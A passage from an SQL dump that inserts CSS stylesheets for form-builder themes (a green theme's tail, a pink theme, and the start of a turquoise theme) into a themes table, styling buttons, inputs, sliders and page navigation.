"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #018D08;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00AC0A;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018F08 ;\r\n	background: -moz-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #018D08 ), color-stop(39%, #018F08 ), color-stop(100%, #00BE0A ));\r\n	background: -webkit-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -o-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -ms-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\nbackground: linear-gradient(to right, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #CEE0D3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(19, 'Theme 05 pink', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B05785;\r\nborder: 1px solid #F6E2ED;\r\nmargin-bottom: 10px;\r\ncolor: #F6E2ED;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/03/nextbg_hover.png) url([SITE_ROOT]/images/05/03/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/03/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6E2ED;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #D7639F;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E47DB3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #D863A0 ;\r\n	background: -moz-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #D7639F ), color-stop(39%, #D863A0 ), color-stop(100%, #F173B4 ));\r\n	background: -webkit-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -o-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -ms-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\nbackground: linear-gradient(to right, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #D6CAD2;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(20, 'Theme 06 turquoise', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B1EBE9;\r\nborder: 1px solid #018580;\r\nmargin-bottom: 10px;\r\ncolor: #018580;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	